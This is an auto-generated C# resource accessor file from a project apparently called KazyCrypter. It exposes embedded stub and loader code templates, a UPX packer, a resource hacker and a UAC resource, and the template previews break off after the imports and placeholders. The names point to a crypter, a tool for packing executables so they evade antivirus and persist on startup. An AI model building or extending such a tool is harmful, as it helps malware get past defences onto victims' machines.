//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.1
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace KazyCrypter.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("KazyCrypter.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        internal static byte[] csc {
            get {
                object obj = ResourceManager.GetObject("csc", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        internal static byte[] cscomp {
            get {
                object obj = ResourceManager.GetObject("cscomp", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        internal static byte[] cscompui {
            get {
                object obj = ResourceManager.GetObject("cscompui", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        internal static System.Drawing.Icon kazy {
            get {
                object obj = ResourceManager.GetObject("kazy", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        internal static byte[] KazyLoader {
            get {
                object obj = ResourceManager.GetObject("KazyLoader", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Collections.Generic;
        ///using System.Text;
        ///using System.Drawing;
        ///using System.Runtime.InteropServices;
        ///using System.Drawing.Imaging;
        ///using System.Reflection;
        ///using System.Resources;
        ///using System.IO;
        ///
        ///%ASSEMBLYINFO%
        ///
        ///namespace Loader
        ///{
        ///    static class Program
        ///    {
        ///		byte[] ll = new byte[] { %LOADERBYTES% };
        ///		delegate void inv(string rname, string nameloc, string key, string[] args);
        ///
        ///        static void Main(string[] args)
        ///        {
        ///			Assembly a = Assembly.Loa [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Loader {
            get {
                return ResourceManager.GetString("Loader", resourceCulture);
            }
        }
        
        internal static byte[] Mono_Cecil {
            get {
                object obj = ResourceManager.GetObject("Mono_Cecil", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        internal static byte[] mt {
            get {
                object obj = ResourceManager.GetObject("mt", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        internal static byte[] ResHacker {
            get {
                object obj = ResourceManager.GetObject("ResHacker", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        internal static byte[] SkinSoft_OSSkin {
            get {
                object obj = ResourceManager.GetObject("SkinSoft_OSSkin", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Runtime.InteropServices;
        ///using System.Reflection;
        ///using System.Resources;
        ///using System.Windows.Forms;
        ///using Microsoft.Win32;
        ///using System.Threading;
        ///using System.IO;
        ///using System.Diagnostics;
        ///using System.IO.Compression;
        ///using System.Net;
        ///using System.Collections.Generic;
        ///using System.Security.AccessControl;
        ///using System.Security.Principal;
        ///
        ///namespace Program
        ///{
        ///    class Program
        ///    {
        ///        static bool Startup = %STARTUP%;
        ///        static string Location = &quot;%L [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string Stub {
            get {
                return ResourceManager.GetString("Stub", resourceCulture);
            }
        }
        
        internal static byte[] uac {
            get {
                object obj = ResourceManager.GetObject("uac", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        internal static byte[] upx {
            get {
                object obj = ResourceManager.GetObject("upx", resourceCulture);
                return ((byte[])(obj));
            }
        }
    }
}
